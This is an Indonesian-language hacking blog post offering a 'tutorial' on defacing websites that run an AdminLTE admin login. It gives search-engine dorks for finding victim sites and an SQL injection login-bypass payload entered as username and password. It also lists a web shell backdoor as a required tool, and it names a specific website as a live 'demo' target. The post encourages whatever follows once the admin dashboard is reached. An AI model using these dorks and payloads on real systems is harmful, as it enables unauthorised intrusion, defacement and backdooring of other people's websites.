Deface Metode Login Form AdminLTE (Vulnerability Bypass SQL Login)

 


Halo sobat hwkwr kali ini mimin share tutor deface lagi yaitu Proof Of Concept :

Deface Metode Login Form AdminLTE (Vulnerability Bypass SQL Login)


Dimana Kerentanan Keamanan website terjadi pada admin login, kesalahan progremer dalam koding web etc, sehingga dapat kita bypass.. 


Bahan Bahan :

- Dork :

- intitle:adminLTE inurl:admin

- intitle:adminLTE inurl:login intext:username

- Shell Backd00R / JSO

- Brain

- Browser / Internet

Username/password: :

' or 1=1 limit 1 -- -+


1) Seperti biasa dorking, pilih site menurut kalian vuln


2) masukkan u/p nya lalu login


3) sukses? Kalian nanti akan dibawakan ke dashboard admin :D 


Oke sekiranya cukup sampai disini saja, jika kedashboard you know lah kau ngapain XD

Demo : sisekar.com/
Lebih baru Lebih lama